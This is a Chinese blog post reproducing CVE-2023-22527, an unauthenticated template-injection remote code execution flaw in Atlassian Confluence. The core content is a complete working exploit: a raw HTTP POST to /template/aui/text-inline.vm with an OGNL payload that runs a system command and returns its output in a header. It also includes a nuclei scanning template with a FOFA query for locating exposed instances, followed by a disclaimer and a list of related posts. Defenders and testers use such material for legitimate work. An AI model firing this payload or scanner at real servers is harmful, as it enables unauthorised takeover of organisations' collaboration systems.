【漏洞复现】Atlassian Confluence RCE(CVE-2023-22527)

已于 2024-06-27 15:40:15 修改
阅读量390 收藏 4
点赞数 9
文章标签: atlassian 漏洞 渗透 网络安全
于 2024-06-26 17:07:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/139993966
版权

产品简介

Atlassian Confluence 是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。

0x02 漏洞概述

Atlassian Confluence /template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷。

0x04 漏洞复现

漏洞POC

 

  1. POST /template/aui/text-inline.vm HTTP/1.1
  2. Host: 192.168.0.70:8090
  3. Accept-Encoding: gzip, deflate, br
  4. Accept: */*
  5. Accept-Language: en-US;q=0.9,en;q=0.8
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
  7. Connection: close
  8. Content-Type: application/x-www-form-urlencoded
  10. label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
 

 

 

nuclei POC
 

 

  1. id: AtlassianConfluenceRCE-CVE-2023-22527
  3. info:
  4. name: CVE-2023-22527
  5. author: xxx
  6. severity: info
  7. description: description
  8. reference:
  9. - https://wiki.agora.ru/
  10. metadata:
  11. fofa-query: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
  12. tags: confluence
  14. requests:
  15. - raw:
  16. - "POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding:\
  17. \ gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent:\
  18. \ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\
  19. \ Gecko) Chrome/119.0.6045.159 Safari/537.36\nConnection: close\nContent-Type:\
  20. \ application/x-www-form-urlencoded\nContent-Length: 288\n\nlabel=\\u0027%2b#request\\\
  21. u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\\
  22. u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new\
  23. \ freemarker.template.utility.Execute()).exec({\"id\"})) "
  25. matchers-condition: and
  26. matchers:
  27. - type: dsl
  28. dsl:
  29. - contains(all_headers,"X-Cmd-Response") && status_code==200  
 

 

 

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

                

        

        

    

  


    

      

        

            

              
                
                  渗透测试老鸟-九青
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
漏洞复现Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行

				
			

			

				

					做自己喜欢的事,并将其发挥到极致!
				

				

					06-06
					
					2249
					
				

			

		

		

			
				
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence  是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式  ,造成远程代码执行。......

			
		

	



                

              
                



	

		

			

				
					
Atlassian Confluence RCE漏洞复现(CVE-2023-22527)

				
			

			

				

					0xSec
				

				

					01-23
					
					2146
					
				

			

		

		

			
				
Atlassian Confluence/template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷

			
		

	



                


  
              

                


	

		

			

				
					
【成功复现Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)

				
			

			

				

					wuli1024的博客
				

				

					01-25
					
					1305
					
				

			

		

		

			
				
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。

			
		

	





	

		

			

				
					
漏洞复现Atlassian Confluence远程代码执行漏洞(CVE-2023-22527)

				
			

			

				

					做自己喜欢的事,并将其发挥到极致!
				

				

					01-24
					
					1334
					
				

			

		

		

			
				
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。

			
		

	



		

			
		



	

		

			

				
					
漏洞复现--Confluence远程代码执行漏洞CVE-2023-22527

				
			

			

				

					qq_53003652的博客
				

				

					01-23
					
					1525
					
				

			

		

		

			
				
Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。微步漏洞团队于近日捕获到Confluence远程代码执行漏洞CVE-2023-22527)情报,攻击者可在无需登录的情况下,利用该漏洞构造恶意请求,导致远程代码执行。

			
		

	





	

		

			

				
					
Atlassian Confluence 远程代码执行漏洞复现CVE-2021-26084)

				
			

			

				

					0xSec
				

				

					01-17
					
					1458
					
				

			

		

		

			
				
Atlassian ConfluenceAtlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。

			
		

	





	

		

			

				
					
Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396)莫得复现

				
			

			

				

					EC_Carrot的博客
				

				

					05-21
					
					480
					
				

			

		

		

			
				
漏洞简介
Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。
影响版本

Atlassian Confluence Server 6.6.12之前版本,6.7.0版本至6.12.3之前版本,6.13.0版本至6.13.3之前版本,6.14.0版本至6.14.2之前版本。

漏洞复现
我的环境为vulhub的靶机,难受的是按照它的流程去安装服务时,发现官网似乎将

			
		

	





	

		

			

				
					
Atlassian Confluence CVE-2022-26134 RCE漏洞

				
			

			

				

					sxr__nc的博客
				

				

					04-22
					
					1115
					
				

			

		

		

			
				
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)

			
		

	





	

		

			

				
					
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现

				
			

			

				

					 记录并分享学习安全的知识点..
				

				

					07-24
					
					2973
					
				

			

		

		

			
				
Atlassian ConfluenceAtlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。
​.........

			
		

	





	

		

			

				
					
Atlassian Confluence RCE漏洞CVE-2023-22527

					
最新发布

				
			

			

				

					weixin_43567873的博客
				

				

					03-11
					
					37
					
				

			

		

		

			
				
Atlassian Confluence RCE漏洞CVE-2023-22527


			
		

	





	

		

			

				
					
Atlassian Confluence远程代码执行漏洞CVE-2022-26134)

				
			

			

				

					tpaer的博客
				

				

					12-09
					
					1629
					
				

			

		

		

			
				
之前看到过Confluence这个洞没太在意以为没什么人用,结果在自己公司遇到了,简单复现一下。

			
		

	





	

		

			

				
					
企业知识管理与协同软件系统Atlassian Confluence 远程代码执行漏洞

				
			

			

				

					weixin_68647219的博客
				

				

					08-01
					
					3508
					
				

			

		

		

			
				
Atlassian Confluence 远程代码执行漏洞高危漏洞,该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改HTTP请求头中的Content-Type值所造成的可能导致远程攻击者构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令。

			
		

	





	

		

			

				
					
【严重】Atlassian Confluence 模板注入代码执行漏洞

				
			

			

				

					murphysec的博客
				

				

					01-17
					
					549
					
				

			

		

		

			
				
Confluence 是由Atlassian公司开发的企业协作和文档管理工具。Atlassian Confluence Data Center/Server 受影响版本中存在模版注入漏洞,攻击者通过构造恶意请求,可以在未登录的情况下在Confluence实例上触发远程代码执行漏洞漏洞已在8.5.4版本中修复,可能与velocity引擎中对snakeyaml、antlr等组件的支持有关。

			
		

	





	

		

			

				
					
高危漏洞预警 | Atlassian Confluence OGNL注入命令执行漏洞复现与分析报告

				
			

			

				

					Fortinet_CHINA的博客
				

				

					06-16
					
					1798
					
				

			

		

		

			
				
近日,Volexity(volexity.com,以下简称为:Volexity)在对从Confluence Server系统收集到的数据进行彻底审查后,发现了攻击者启动Exp以实现远程代码执行,随后Volexity重新创建了该漏洞的利用并在最新版本的Confluence Server上进行了复现Atlassian 已确认该漏洞,并上报给CVE,确认漏洞编号为“ CVE-2022-26134。Fortinet 中国安全团队针对此次漏洞信息,进行即时响应并成功验证。......

			
		

	





	

		

			

				
					
CVE-2022-26134】Confluence OGNL RCE 漏洞

				
			

			

				

					weixin_45742777的博客
				

				

					09-09
					
					7983
					
				

			

		

		

			
				
CVE-2022-26134】Confluence OGNL RCE 漏洞

			
		

	





	

		

			

				
					
confluence模版注入漏洞_CVE-2023-22527

				
			

			

				

					网络安全。
				

				

					01-24
					
					628
					
				

			

		

		

			
				
ConfluenceAtlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。Confluence Data Center和Confluence Server多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行。

			
		

	





	

		

			

				
					
Atlassian confluence漏洞分析合集

				
			

			

				

					不忘初心,护天下安全!
				

				

					06-22
					
					469
					
				

			

		

		

			
				
Atlassian Confluence Server是澳大利亚Atlassian公司的一套协同软件服务器版本,具有企业知识管理功能,并支持用于构建企业WiKi。Atlassian Confluence Data Center 是 Atlassian Confluence 的数据中心版本。Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。 利用该漏洞可以读取服务器上任意文件6.1.0  ...

			
		

	





	

		

			

				
					
Atlassian Confluence 模板注入代码执行漏洞

				
			

			

				

					qq_32947907的博客
				

				

					01-23
					
					812
					
				

			

		

		

			
				
Confluence 是由Atlassian公司开发的企业协作和文档管理工具。Atlassian Confluence Data Center/Server 受影响版本中由于velocity vm模版可未授权访问,其中/aui/text-inline.vm使用findValue解析OGNL表达式,表达式过滤不严,导致存在模版注入漏洞。攻击者可通过构造恶意请求,可以在未登录的情况下在Confluence实例上触发远程代码执行漏洞

			
		

	





	

		

			

				
					
Atlassian修复了一个关键的Confluence漏洞

				
			

			

				

					m0_71746416的博客
				

				

					02-15
					
					215
					
				

			

		

		

			
				
Atlassian发布了安全更新

			
		

	





	

		

			

				
					
Docker中部署Confluence与Jira-Software详细步骤

				
			

			

				

					
				

			

		

		

			
				
 $docker pull atlassian/confluence-server:  $docker pull atlassian/jira-software:  ```  4. 创建并运行Docker容器:  配置好相应的环境变量和端口映射,使用`docker run`命令启动Confluence和Jira Software容器...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值